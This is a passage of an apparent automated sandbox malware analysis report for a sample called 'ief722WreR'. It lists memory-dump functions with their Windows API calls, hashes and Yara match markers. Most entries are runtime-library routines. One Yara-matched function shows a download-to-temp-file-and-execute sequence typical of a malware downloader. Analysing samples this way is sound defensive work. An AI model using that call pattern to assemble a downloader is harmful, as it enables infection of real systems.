                                                      • _free.LIBCMT ref: 0043A695
                                                      • _free.LIBCMT ref: 0043A6A8
                                                      • _free.LIBCMT ref: 0043A6B6
                                                      • _free.LIBCMT ref: 0043A6C1
                                                      • _free.LIBCMT ref: 0043A6F9
                                                      • _free.LIBCMT ref: 0043A700
                                                      • _free.LIBCMT ref: 0043A71D
                                                      • _free.LIBCMT ref: 0043A735
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 024BA8A3
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C0F
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C21
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C33
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C45
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C57
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C69
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C7B
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C8D
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C9F
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CB1
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CC3
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CD5
                                                        • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CE7
                                                      • _free.LIBCMT ref: 024BA898
                                                        • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                        • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                      • _free.LIBCMT ref: 024BA8BA
                                                      • _free.LIBCMT ref: 024BA8CF
                                                      • _free.LIBCMT ref: 024BA8DA
                                                      • _free.LIBCMT ref: 024BA8FC
                                                      • _free.LIBCMT ref: 024BA90F
                                                      • _free.LIBCMT ref: 024BA91D
                                                      • _free.LIBCMT ref: 024BA928
                                                      • _free.LIBCMT ref: 024BA960
                                                      • _free.LIBCMT ref: 024BA967
                                                      • _free.LIBCMT ref: 024BA984
                                                      • _free.LIBCMT ref: 024BA99C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction ID: 92d23df85c1984dc914b7e8637133f71fc969108bfee2958722c8502051df644
                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction Fuzzy Hash: 1D317C316002109FEB32AF3AD844BDBB7E9AF04750F15486FE449D7750DB71A851EA74
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                      • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                      • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                      • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                      APIs
                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02482C7E
                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02482C94
                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 02482CB0
                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02482CC6
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02482CFF
                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02482D3B
                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02482D58
                                                      • ShellExecuteExW.SHELL32(?), ref: 02482DCF
                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 02482DE4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                      • String ID: <
                                                      • API String ID: 838076374-4251816714
                                                      • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                      • Instruction ID: dfc0e9ab0bee59850993c5f6ec385f4a29eda9a922dcd16b32129501a44d6022
                                                      • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                      • Instruction Fuzzy Hash: FA41437190025DAEEB20DF659C85FEA77FCFF05745F0080E6A545A2150DF709E858FA4
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0249F228,00000004,02497D87,00000004,02498069), ref: 0249EEF9
                                                      • GetLastError.KERNEL32(?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000,?), ref: 0249EF05
                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000), ref: 0249EF15
                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 0249EF2B
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF41
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF58
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF6F
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF86
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF9D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                      • String ID: advapi32.dll
                                                      • API String ID: 2340687224-4050573280
                                                      • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                      • Instruction ID: ae1f1b908bb710a69dc326704798a663ad78eb0d77ed836575b414cbbd08f05a
                                                      • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                      • Instruction Fuzzy Hash: 882141B6904611BFEB10AFB49C08E5ABFA8EF05B16F004A2BF555D3650DBBC94418FA4
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0249F228,00000004,02497D87,00000004,02498069), ref: 0249EEF9
                                                      • GetLastError.KERNEL32(?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000,?), ref: 0249EF05
                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000), ref: 0249EF15
                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 0249EF2B
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF41
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF58
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF6F
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF86
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF9D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                      • String ID: advapi32.dll
                                                      • API String ID: 2340687224-4050573280
                                                      • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                      • Instruction ID: 6bb739f46a4a403fbf10ae7054893b96a74a4733b720baee6ff1b43ea12858a0
                                                      • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                      • Instruction Fuzzy Hash: 9A2181B2904711BFEB10AF649C08E5ABFECEF05B16F004A2BF555D3600DBBC94418BA8
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0249670B), ref: 024924B6
                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024924C4
                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024924D2
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0249670B), ref: 02492500
                                                      • GetProcAddress.KERNEL32(00000000), ref: 02492507
                                                      • GetLastError.KERNEL32(?,?,?,0249670B), ref: 02492522
                                                      • GetLastError.KERNEL32(?,?,?,0249670B), ref: 0249252E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492544
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02492552
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID: kernel32.dll
                                                      • API String ID: 4179531150-1793498882
                                                      • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                      • Instruction ID: d2f11704ab62b6b290706afb9712ea2c6399a1e213f3ede4b01012700adeb202
                                                      • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                      • Instruction Fuzzy Hash: 231186759013117FEB11BB756C5996B7FAC9D45B12710052BB801E2251EBB4D5008A69
                                                      APIs
                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                        • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                      • String ID: pContext$switchState
                                                      • API String ID: 3151764488-2660820399
                                                      • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                      • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                      • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                      • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                      • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                      • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                      • SafeRWList.LIBCONCRT ref: 00419798
                                                        • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                        • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                      • GetLastError.KERNEL32 ref: 004197B9
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                      • String ID: eventObject
                                                      • API String ID: 1999291547-1680012138
                                                      • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                      • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                      • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                      • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 024A0C36
                                                      • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024A0C9D
                                                      • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024A0CBA
                                                      • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024A0D20
                                                      • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024A0D35
                                                      • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024A0D47
                                                      • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024A0D75
                                                      • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024A0D80
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024A0DAC
                                                      • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024A0DBC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                      • String ID:
                                                      • API String ID: 3720063390-0
                                                      • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                      • Instruction ID: 10daa1dcfb88a4d8b5ad48e1a0e43cfeaab409df032b99148b1bbd94d4ebfce7
                                                      • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                      • Instruction Fuzzy Hash: C741E571A042089BCF19FFA5C4647EE7BA6AF22304F04406FD8465B382CF759A09CF66
                                                      APIs
                                                      • _free.LIBCMT ref: 00431DFA
                                                        • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                      • _free.LIBCMT ref: 00431E06
                                                      • _free.LIBCMT ref: 00431E11
                                                      • _free.LIBCMT ref: 00431E1C
                                                      • _free.LIBCMT ref: 00431E27
                                                      • _free.LIBCMT ref: 00431E32
                                                      • _free.LIBCMT ref: 00431E3D
                                                      • _free.LIBCMT ref: 00431E48
                                                      • _free.LIBCMT ref: 00431E53
                                                      • _free.LIBCMT ref: 00431E61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                      APIs
                                                      • _free.LIBCMT ref: 024B2061
                                                        • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                        • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                      • _free.LIBCMT ref: 024B206D
                                                      • _free.LIBCMT ref: 024B2078
                                                      • _free.LIBCMT ref: 024B2083
                                                      • _free.LIBCMT ref: 024B208E
                                                      • _free.LIBCMT ref: 024B2099
                                                      • _free.LIBCMT ref: 024B20A4
                                                      • _free.LIBCMT ref: 024B20AF
                                                      • _free.LIBCMT ref: 024B20BA
                                                      • _free.LIBCMT ref: 024B20C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction ID: 192fda9dc25ff0fe950178ab54c2a0ae022822eee28bf341ce0b93ec51d0ee92
                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction Fuzzy Hash: DB117775600108AFCB52EF66C841CD93FA6EF04750B5140AABA094F221D771EE60EF60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID: F(@$F(@
                                                      • API String ID: 4189289331-2038261262
                                                      • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                      • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                      • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                      • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-3064271455
                                                      • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                      • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                      • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                      • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                      • Instruction ID: c30e0025f48e379c8364d3ff4673cd5a9d769290eec4118bb3ca1b6504002b8c
                                                      • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                      • Instruction Fuzzy Hash: BDC1B274E04245AFDB17DFAAC840BEEBFB5AF09314F04419AE414AB391C7749942CB71
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                      • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                      • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: fB$csm
                                                      • API String ID: 1170836740-1586063737
                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                      APIs
                                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                      • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                      • PMDtoOffset.LIBCMT ref: 00428D4F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: FindInstanceTargetType$Offset
                                                      • String ID: Bad dynamic_cast!
                                                      • API String ID: 1467055271-2956939130
                                                      • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                      • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                      • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                      • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                      APIs
                                                      • atomic_compare_exchange.LIBCONCRT ref: 0249C6DC
                                                      • atomic_compare_exchange.LIBCONCRT ref: 0249C700
                                                      • std::_Cnd_initX.LIBCPMT ref: 0249C711
                                                      • std::_Cnd_initX.LIBCPMT ref: 0249C71F
                                                        • Part of subcall function 02481370: __Mtx_unlock.LIBCPMT ref: 02481377
                                                      • std::_Cnd_initX.LIBCPMT ref: 0249C72F
                                                        • Part of subcall function 0249C3EF: __Cnd_broadcast.LIBCPMT ref: 0249C3F6
                                                      • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0249C73D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                      • String ID: t#D
                                                      • API String ID: 4258476935-1671555958
                                                      • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                      • Instruction ID: 4907e0a9ff6aff853fcbd1f913a4c98d432ceb0e9437733168729e7620dc4747
                                                      • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                      • Instruction Fuzzy Hash: 1001F271900605ABDF11FBA2DD84B9EBB6AAF04310F14005BE90597680EBB8AA158F92
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                      • __alloca_probe_16.LIBCMT ref: 004321C6
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                      • __alloca_probe_16.LIBCMT ref: 004322AB
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                      • __freea.LIBCMT ref: 0043231B
                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                      • __freea.LIBCMT ref: 00432324
                                                      • __freea.LIBCMT ref: 00432349
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
